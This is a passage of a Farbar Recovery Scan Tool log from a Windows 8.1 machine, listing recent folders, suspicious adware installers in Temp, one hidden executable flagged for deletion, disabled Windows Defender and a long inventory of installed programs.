2017-03-31 14:53 - 2016-11-23 22:34 - 00000000 ____D C:\Program Files (x86)\Adobe
2017-03-31 14:53 - 2016-08-10 17:02 - 00000000 ____D C:\ProgramData\Adobe
2017-03-31 00:37 - 2016-08-13 03:54 - 00000000 ____D C:\Users\Mehrad\AppData\Roaming\cobra
2017-03-30 09:45 - 2016-08-10 15:22 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Intel PROSet Wireless
2017-03-30 09:45 - 2016-08-10 15:21 - 00000000 ____D C:\ProgramData\Intel
2017-03-26 17:02 - 2016-08-10 15:45 - 00000000 ____D C:\ProgramData\NVIDIA Corporation
2017-03-26 17:01 - 2016-08-10 15:46 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2017-03-26 17:01 - 2016-08-10 15:43 - 00000000 ____D C:\Program Files\NVIDIA Corporation
2017-03-26 16:59 - 2013-08-22 20:06 - 00000000 ____D C:\Windows\Help
2017-03-26 16:42 - 2016-10-24 06:33 - 00000000 ____D C:\Program Files (x86)\Folder Marker
2017-03-26 12:39 - 2017-01-15 08:29 - 00000000 ____D C:\Users\Mehrad\.android
2017-03-26 05:57 - 2016-08-10 15:21 - 00000000 ____D C:\ProgramData\Package Cache
2017-03-26 04:52 - 2017-03-20 23:20 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Discord
2017-03-26 04:15 - 2013-08-22 19:14 - 00426600 _____ C:\Windows\system32\FNTCACHE.DAT
2017-03-26 03:51 - 2016-08-10 15:33 - 00000000 ____D C:\Program Files\DIFX
==================== Files in the root of some directories =======
2017-01-01 01:53 - 2017-01-01 01:53 - 0000112 _____ () C:\Users\Mehrad\AppData\Roaming\JP2K CS6 Prefs
2016-09-07 02:46 - 2016-09-07 04:30 - 0000924 _____ () C:\Users\Mehrad\AppData\Roaming\KB8888239.log
2016-12-11 18:46 - 2017-04-09 04:59 - 0000028 _____ () C:\Users\Mehrad\AppData\Roaming\kulerdata.json
2016-08-28 08:52 - 2017-03-14 21:02 - 0001456 _____ () C:\Users\Mehrad\AppData\Local\Adobe Save for Web 13.0 Prefs
2016-08-10 15:30 - 2017-04-24 18:51 - 0729443 _____ () C:\Users\Mehrad\AppData\Local\BTServer.log
2016-11-20 19:56 - 2017-04-08 16:48 - 0004608 _____ () C:\Users\Mehrad\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2017-03-26 05:52 - 2017-03-26 05:57 - 49685376 _____ (Sony) C:\Users\Mehrad\AppData\Local\pcc.exe
2017-04-24 18:50 - 2017-04-24 18:50 - 0000000 ____H () C:\ProgramData\cm-lock
2016-08-10 15:28 - 2016-08-10 15:28 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2016-08-12 05:25 - 2016-05-05 21:07 - 98472192 ___SH () C:\ProgramData\msvmvvrc.exe
Files to move or delete:
====================
C:\ProgramData\msvmvvrc.exe
Some files in TEMP:
====================
2017-04-24 02:00 - 2017-04-24 02:00 - 0000000 _____ () C:\Users\Mehrad\AppData\Local\Temp\AnonymizerGadgetSetup.1.000.1680.exe
2017-04-24 01:55 - 2017-04-24 01:57 - 6216680 _____ (AppTrailers) C:\Users\Mehrad\AppData\Local\Temp\AppTrailers.9.1.10amt.exe
2017-04-13 17:17 - 2014-11-21 09:44 - 0854528 _____ (Microsoft Corporation) C:\Users\Mehrad\AppData\Local\Temp\cdo1984557463.dll
2017-04-24 17:58 - 2014-11-21 09:44 - 0854528 _____ (Microsoft Corporation) C:\Users\Mehrad\AppData\Local\Temp\cdo225192602.dll
2017-04-13 19:39 - 2014-11-21 09:44 - 0854528 _____ (Microsoft Corporation) C:\Users\Mehrad\AppData\Local\Temp\cdo2918743458.dll
2017-04-13 23:44 - 2014-11-21 09:44 - 0854528 _____ (Microsoft Corporation) C:\Users\Mehrad\AppData\Local\Temp\cdo335813603.dll
2017-04-24 16:35 - 2014-11-21 09:44 - 0854528 _____ (Microsoft Corporation) C:\Users\Mehrad\AppData\Local\Temp\cdo4103119261.dll
2017-04-24 10:56 - 2017-04-24 10:56 - 2048673 _____ ( ) C:\Users\Mehrad\AppData\Local\Temp\e2b82139-28b6-11e7-828a-7429af927dee.exe
2017-04-24 01:53 - 2017-04-24 01:53 - 0386949 _____ ( ) C:\Users\Mehrad\AppData\Local\Temp\global_installer.exe
2017-04-24 01:53 - 2017-04-24 01:53 - 0000000 _____ () C:\Users\Mehrad\AppData\Local\Temp\load.exe
2017-04-24 02:00 - 2017-04-24 02:00 - 0000000 _____ () C:\Users\Mehrad\AppData\Local\Temp\netstream.exe
2017-04-24 01:53 - 2017-04-24 01:54 - 4417064 _____ () C:\Users\Mehrad\AppData\Local\Temp\OneSystemCare.exe
2017-04-24 02:00 - 2017-04-24 02:00 - 0000000 _____ () C:\Users\Mehrad\AppData\Local\Temp\setup (1).exe
2017-04-24 01:52 - 2017-04-24 01:52 - 0488448 _____ () C:\Users\Mehrad\AppData\Local\Temp\setup.exe
2017-04-24 01:55 - 2017-04-24 01:55 - 1199825 _____ () C:\Users\Mehrad\AppData\Local\Temp\unins000.exe
2017-04-24 01:54 - 2017-04-24 01:55 - 1249917 _____ (VideoBox ) C:\Users\Mehrad\AppData\Local\Temp\vbsetup.exe
2017-04-24 01:58 - 2017-04-24 02:00 - 0000000 _____ () C:\Users\Mehrad\AppData\Local\Temp\wajam_install.exe
==================== Bamital & volsnap ======================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2017-04-23 05:26
==================== End of FRST.txt ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 23-04-2017 01
Ran by Mehrad (24-04-2017 18:56:48)
Running from C:\Users\Mehrad\Downloads\Programs\New folder
Windows 8.1 Pro (Update) (X64) (2016-08-10 10:44:20)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-4257933716-793472738-408171945-500 - Administrator - Disabled)
Guest (S-1-5-21-4257933716-793472738-408171945-501 - Limited - Disabled)
Mehrad (S-1-5-21-4257933716-793472738-408171945-1001 - Administrator - Enabled) => C:\Users\Mehrad
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
20SPEED (HKLM-x32\...\{8F6A8841-AF89-4A99-9EC5-F07733642300}_is1) (Version: 6.7 - 20SPEED VPN)
3D Bridge DS4 (64bit) (HKLM-x32\...\3D Bridge DS4 (64bit) 1.3.2.118) (Version: 1.3.2.118 - DAZ 3D)
7-Zip 16.04 (x64) (HKLM\...\7-Zip) (Version: 16.04 - Igor Pavlov)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 25.0.0.134 - Adobe Systems Incorporated)
Adobe AIR Settings Manager (HKLM-x32\...\com.adobe.air.settings.manager.419D633A757E8B26DD2BDB301927BA7BA7490F38.1) (Version: 1.5 - Adobe Systems Incorporated) <==== ATTENTION
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.9.0.327 - Adobe Systems Incorporated)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.127 - Adobe Systems Incorporated)
Adobe Photoshop CC 2017 (HKLM-x32\...\PHSP_18_0) (Version: 18.0.0 - Adobe Systems Incorporated)
Aegisub 3.2.2 (HKLM\...\{24BC8B57-716C-444F-B46B-A3349B9164C5}_is1) (Version: 3.2.2 - Aegisub Team)
APB Reloaded (HKLM\...\Steam App 113400) (Version: - Reloaded Productions)
Archeblade (HKLM\...\Steam App 207230) (Version: - CodeBrush Games)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.12 - Michael Tippach)
Attack on Titan Wings of Freedom (HKLM-x32\...\Attack on Titan Wings of Freedom_is1) (Version: - )
Audio Speed Changer Pro 1.5 (HKLM-x32\...\Audio Speed Changer Pro) (Version: 1.5 - SuperUtils.com Software)
Autodesk 3ds Max 2014 (HKLM\...\Autodesk 3ds Max 2014) (Version: 16.0.420.0 - Autodesk)
Autodesk 3ds Max 2014 (Version: 16.0.420.0 - Autodesk) Hidden
Autodesk 3ds Max 2014 64-bit Populate Data (HKLM\...\{7491836B-659E-47DD-ABBF-F875AD48FD10}) (Version: 1.0.0.1 - Autodesk)
Autodesk Backburner 2014 (HKLM-x32\...\{3D347E6D-5A03-4342-B5BA-6A771885F379}) (Version: 14.0.0.0 - Autodesk, Inc.)
Autodesk Composite 2014 (HKLM\...\Autodesk Composite 2014) (Version: 9.0.0.0 - Autodesk)
Autodesk Composite 2014 (Version: 9.0.0.0 - Autodesk) Hidden
Autodesk DirectConnect 2014 64-bit (HKLM\...\Autodesk DirectConnect 2014 64-bit) (Version: 8.0.56.1 - Autodesk)
Autodesk DirectConnect 2014 64-bit (Version: 8.0.56.1 - Autodesk) Hidden
Autodesk Essential Skills Movies for 3ds Max 2014 64-bit (HKLM\...\{E8814D63-BB76-4C89-A25E-264ECF11D00D}) (Version: 1.2.0.0 - Autodesk)
Autodesk Inventor Server Engine for 3ds Max 2014 64-bit (HKLM\...\{009751C6-22D7-4548-A313-AD48FA57076F}) (Version: 16.0 - Autodesk)
Autodesk Material Library 2014 (HKLM-x32\...\{644F9B19-A462-499C-BF4D-300ABC2A28B1}) (Version: 4.0.32.600 - Autodesk)
Autodesk Material Library Base Resolution Image Library 2014 (HKLM-x32\...\{51BF3210-B825-4092-8E0D-66D689916E02}) (Version: 4.0.32.600 - Autodesk)
Autodesk Material Library Medium Resolution Image Library 2014 (HKLM-x32\...\{A0633D4E-5AF2-4E3E-A70A-FE9C2BD8A958}) (Version: 4.0.32.600 - Autodesk)
Autodesk Revit Interoperability for 3ds Max 2014 (HKLM\...\Autodesk Revit Interoperability for 3ds Max 2014) (Version: 13.02.15161 - Autodesk)
Autodesk Revit Interoperability for 3ds Max 2014 (Version: 13.02.15161 - Autodesk) Hidden
Barnyard (HKLM-x32\...\InstallShield_{4162D37F-14D6-495A-BE76-35DA9402E29A}) (Version: 1.00.0000 - THQ)
Barnyard (x32 Version: 1.00.0000 - THQ) Hidden
BitTorrent (HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\BitTorrent) (Version: 7.9.9.43389 - BitTorrent Inc.)
BlueStacks App Player 0.9.7.4101 Superuser BSEasy (HKLM-x32\...\{FDB8F715-FC8D-4C20-B614-E0361BB69A17}) (Version: 0.9.7.4101 - BlueStack Systems, Inc.)
Brawl of Ages (HKLM\...\Steam App 529840) (Version: - BNA Studios, LLC)
Camtasia 9 (HKLM-x32\...\{1d9398f4-c133-41a0-9ea1-1600af791234}) (Version: 9.0.3.1627 - TechSmith Corporation)
Camtasia 9 (Version: 9.0.3.1627 - TechSmith Corporation) Hidden
Camtasia Studio 8 (HKLM-x32\...\{72144B9D-58C4-4C09-A5CF-C6A914B912E8}) (Version: 8.0.0.878 - TechSmith Corporation)
Castle Crashers (HKLM-x32\...\Castle CrashersFinal) (Version: Final - Game-Owl)
CCleaner (HKLM\...\CCleaner) (Version: 5.22 - Piriform)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{AF312B06-5C5C-468E-89B3-BE6DE2645722}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{0A4EF0E6-A912-4CDE-A7F3-6E56E7C13A2F}) (Version: 1.1.6 - Cisco Systems, Inc.)
CloneCD (HKLM-x32\...\CloneCD) (Version: - SlySoft)
COMODO Antivirus (HKLM\...\COMODO Internet Security) (Version: 10.0.1.6209 - COMODO Security Solutions Inc.)
COMODO Antivirus (Version: 10.0.1.6209 - COMODO Security Solutions Inc.) Hidden
Corel Graphics - Windows Shell Extension (HKLM\...\_{B16BB34E-B7BF-47DF-8658-BEABCF40CD6A}) (Version: 16.1.0.843 - Corel Corporation)
Corel Graphics - Windows Shell Extension (Version: 16.1.843 - Corel Corporation) Hidden
Corel Graphics - Windows Shell Extension 32 Bit (Version: 16.1.843 - Corel Corporation) Hidden
Corel Painter 2016 - Content (Version: 15.0 - Corel Corporation) Hidden
Corel Painter 2016 - Core (Version: 15.0 - Corel Corporation) Hidden
Corel Painter 2016 - Corex64 (Version: 15.0 - Corel Corporation) Hidden
Corel Painter 2016 - CT (Version: 15.0 - Corel Corporation) Hidden
Corel Painter 2016 - DE (Version: 15.0 - Corel Corporation) Hidden
Corel Painter 2016 - EN (Version: 15.0 - Corel Corporation) Hidden
Corel Painter 2016 - FR (Version: 15.0 - Corel Corporation) Hidden
Corel Painter 2016 - IPM (Version: 15.0 - Corel Corporation) Hidden
Corel Painter 2016 - IPM Content (Version: 15.0 - Corel Corporation) Hidden
Corel Painter 2016 - JP (Version: 15.0 - Corel Corporation) Hidden
Corel Painter 2016 (HKLM\...\_{D67BA419-F1DE-42C2-A319-DE5F15A05333}) (Version: 15.0.0.689 - Corel Corporation)
CorelDRAW Graphics Suite X6 - Capture (x64) (Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 - Common (x64) (Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 - Connect (x64) (Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 - Custom Data (x64) (Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 - Draw (x64) (Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 - EN (x64) (Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 - Filters (x64) (Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 - FontNav (x64) (Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 - IPM (Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 - PHOTO-PAINT (x64) (Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 - Redist (x64) (Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 - Setup Files (x64) (Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 - VBA (x64) (Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 - VideoBrowser (x64) (Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 - VSTA (x64) (Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 - Writing Tools (x64) (Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 (64-Bit) (HKLM\...\_{BDBFAC49-8877-472F-876B-75ADB7DBC955}) (Version: 16.1.0.843 - Corel Corporation)
CorelDRAW Graphics Suite X6 (x64) (Version: 16.1 - Corel Corporation) Hidden
DAZ PostgreSQL CMS (HKLM-x32\...\DAZ PostgreSQL CMS 9.3.4.3) (Version: 9.3.4.3 - DAZ 3D)
Defraggler (HKLM\...\Defraggler) (Version: 2.21 - Piriform)
Dexpot (HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\Dexpot) (Version: 1.5.15 - Dexpot GbR)
DRAGON BALL XENOVERSE 2 (HKLM-x32\...\DRAGON BALL XENOVERSE 2_is1) (Version: - )
Dragon UnPACKer 5 (HKLM-x32\...\DragonUnPACKer5_is1) (Version: 5.7.0 Beta - Alexandre Devilliers (aka Elbereth))
Dying Light (HKLM-x32\...\RHlpbmdMaWdodA==_is1) (Version: 1 - )
EaseUS Data Recovery Wizard (HKLM\...\EaseUS Data Recovery Wizard_is1) (Version: - EaseUS)
Energy Manager (HKLM-x32\...\InstallShield_{AC768037-7079-4658-AC24-2897650E0ABE}) (Version: 1.5.0.20 - Lenovo)
Energy Manager (x32 Version: 1.5.0.20 - Lenovo) Hidden
FL Studio 12 (HKLM-x32\...\FL Studio 12) (Version: - Image-Line)
FL Studio ASIO (HKLM-x32\...\FL Studio ASIO) (Version: - Image-Line)
Flashtool (HKLM-x32\...\Flashtool) (Version: 0.9.18.5 - Androxyde)
Folder Marker Pro (HKLM\...\Folder Marker Pro_is1) (Version: 4.2 - ArcticLine Software)
Foxit Reader (HKLM-x32\...\Foxit Reader_is1) (Version: 8.2.0.2051 - Foxit Software Inc.)
Free MP3 WMA OGG Converter 10.1.2 (HKLM-x32\...\Free MP3 WMA OGG Converter_is1) (Version: - CyberPower Tech, Inc.)
GeForce Experience NvStream Client Components (Version: 1.6.28 - NVIDIA Corporation) Hidden
Genesis Starter Essentials (HKLM-x32\...\Genesis Starter Essentials 1.13) (Version: 1.13 - DAZ 3D)
God Eater 2 - Rage Burst (HKLM-x32\...\{916C2EBD-8BD4-4C33-BD23-2FE086051665}_is1) (Version: - BANDAI NAMCO)
Google Chrome (HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\Google Chrome) (Version: 57.0.2987.133 - Google Inc.)
HandBrake 1.0.3 (HKLM-x32\...\HandBrake) (Version: 1.0.3 - )
HF pAppLoc version 1.2 (HKLM-x32\...\{9143B17E-BBDE-4EA7-A4E3-20D384D9C8A5}_is1) (Version: 1.2 - Inquisitor)
Hotspot Shield 6.5.2 (HKLM-x32\...\{3421ebee-874e-4668-9a74-fec88239d649}) (Version: 6.5.2.10372 - AnchorFree Inc.)
Hotspot Shield 6.5.2 (x32 Version: 6.5.2 - AnchorFree Inc.) Hidden
Hotspot Shield 6.5.2 (x32 Version: 6.5.2.10372 - AnchorFree Inc.) Hidden
IconHandler 64 bit (Version: 2.0 - Corel Corporation) Hidden
IL Download Manager (HKLM-x32\...\IL Download Manager) (Version: - Image-Line)
ILLUSION ジンコウガクエン2 (HKLM-x32\...\{AF83EF7D-353A-4E0C-9919-C4E4BCB5F742}) (Version: 1.00.0000 - ILLUSION)
ILLUSION ジンコウガクエン2 きゃらめいく (HKLM-x32\...\{A56F495B-7075-4510-AC91-485416140DA2}) (Version: 1.00.0000 - ILLUSION)
Intel® C++ Redistributables for Windows* on Intel® 64 (HKLM-x32\...\{D2437C5C-2D8C-40D2-8059-689AD7239FA3}) (Version: 11.1.048 - Intel Corporation)
Intel® Manageability Engine Firmware Recovery Agent (HKLM-x32\...\{0EC7F9CC-4741-45AE-9F55-6E9343F726F5}) (Version: 1.1.0.36960 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3540 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 13.0.2.1000 - Intel Corporation)
Intel® PROSet/Wireless Software (HKLM-x32\...\{85b9d34f-7397-4e39-8600-07942ef6ca04}) (Version: 17.0.5 - Intel Corporation)
Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version: - Tonec Inc.)
Internet Security Essentials (HKLM-x32\...\ComodoIse) (Version: 1.1.413499.43 - Comodo)
ioTablet (HKLM-x32\...\{896A285E-2DC4-4C73-BEDA-964244FD658A}) (Version: 1.02.00.02 - KYE)
iRoot (HKLM-x32\...\{1295E43F-382A-4CB2-9E0F-079C0D7401BB}_is1) (Version: 1.8.6.20013 - SING)
Java 7 Update 9 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86417009FF}) (Version: 7.0.90 - Oracle)
Java 8 Update 11 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418011FF}) (Version: 8.0.110 - Oracle Corporation)
Kingo ROOT version 1.4.3.2539 (HKLM-x32\...\{AE7675D6-0B31-494F-ABFA-822E1A0FDF17}_is1) (Version: 1.4.3.2539 - Kingosoft Technology Ltd.)
KMPlayer (remove only) (HKLM-x32\...\The KMPlayer) (Version: 4.0.4.6 - PandoraTV)
KMSpico (HKLM\...\{8B29D47F-92E2-4C20-9EE0-F710991F5D7C}_is1) (Version: - )
LAV Filters 0.69 (HKLM-x32\...\lavfilters_is1) (Version: 0.69 - Hendrik Leppkes)
Lenovo EasyCamera (HKLM-x32\...\{E0A7ED39-8CD6-4351-93C3-69CCA00D12B4}) (Version: 6.2.9200.10279 - Realtek Semiconductor Corp.)
Lenovo pointing device (HKLM\...\Elantech) (Version: 11.4.67.1 - ELAN Microelectronic Corp.)
Live2D Cubism 2.1.16 (HKLM-x32\...\Live2D Cubism) (Version: 2.1.16 - Live2D Inc.)
Live2D Viewer (HKLM-x32\...\Live2DViewer) (Version: 2.2.10 - Live2D Inc)
Live2D Viewer (x32 Version: 2.2.10 - Live2D Inc) Hidden
Manga Studio (HKLM-x32\...\{CFA66508-B19D-4032-AB0A-EBBA2BDF1368}) (Version: 5.0.3 - Smith Micro)
MEGAsync (HKLM-x32\...\MEGAsync) (Version: - Mega Limited)
Microsoft .NET Framework 2.0 fix Version 1.0.0.1 (HKLM-x32\...\{C12304D8-48C3-46C9-A62F-82FFAFC04170}_is1) (Version: 1.0.0.1 - Wondershare, Inc.)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61187 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61186 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.7523 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.7523 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.7523 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.7523 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (HKLM\...\{37B8F9C7-03FB-3253-8781-2517C99D7C00}) (Version: 11.0.61030 - Microsoft Corporation)
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (HKLM\...\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}) (Version: 11.0.61030 - Microsoft Corporation)
Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 (HKLM-x32\...\{B175520C-86A2-35A7-8619-86DC379688B9}) (Version: 11.0.61030 - Microsoft Corporation)
Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 (HKLM-x32\...\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}) (Version: 11.0.61030 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (HKLM\...\{929FBD26-9020-399B-9A7A-751D61F0B942}) (Version: 12.0.21005 - Microsoft Corporation)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (HKLM\...\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}) (Version: 12.0.21005 - Microsoft Corporation)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (HKLM-x32\...\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}) (Version: 12.0.21005 - Microsoft Corporation)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (HKLM-x32\...\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}) (Version: 12.0.21005 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24210 (HKLM-x32\...\{f144e08f-9cbe-4f09-9a8c-f2b858b7ee7f}) (Version: 14.0.24210.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual F# 2.0 Runtime (HKLM-x32\...\{85467CBC-7A39-33C9-8940-D72D9269B84F}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual J# 2.0 Redistributable Package - SE (x64) (HKLM\...\{B0A5A6EE-F8BA-48B1-BB32-BAC17E96C2B4}) (Version: 2.0.50728 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2.0 - ENU (HKLM-x32\...\{AA4A4B2C-0465-3CF8-BA76-27A027D8ACAB}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2.0 Runtime (HKLM-x32\...\{299C0434-4F4E-341F-A916-4E07AEB35E79}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Windows Application Compatibility Database (HKLM\...\{deb7008b-681e-4a4a-8aae-cc833e8216ce}.sdb) (Version: - )
MKVToolNix 6.9.1 (32bit) [20140514-602] (HKLM-x32\...\MKVToolNix) (Version: 6.9.1 - Moritz Bunkus)
Move or Die v5.0.4 (HKLM-x32\...\vsetop.com Move or Die v5.0.4_is1) (Version: 5.0.4 - VseTop.Com)
Mozilla Firefox 43.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 43.0.1 (x86 en-US)) (Version: 43.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 40.0 - Mozilla)
MPC-BE x64 1.4.5.787 (HKLM\...\{FE09AF6D-78B2-4093-B012-FCDAF78693CE}_is1) (Version: 1.4.5.787 - MPC-BE Team)
MPC-HC 1.7.10 (64-bit) (HKLM\...\{2ACBF1FA-F5C3-4B19-A774-B22A31F231B9}_is1) (Version: 1.7.10 - MPC-HC Team)
MultiExtractor 4.7.1.0 (HKLM-x32\...\MultiExtractor_is1) (Version: - Drobinski Maciej StrongRecovery)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.9.2 - Notepad++ Team)
NVIDIA GeForce Experience 1.8.2 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 1.8.2 - NVIDIA Corporation)
NVIDIA Graphics Driver 332.50 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 332.50 - NVIDIA Corporation)
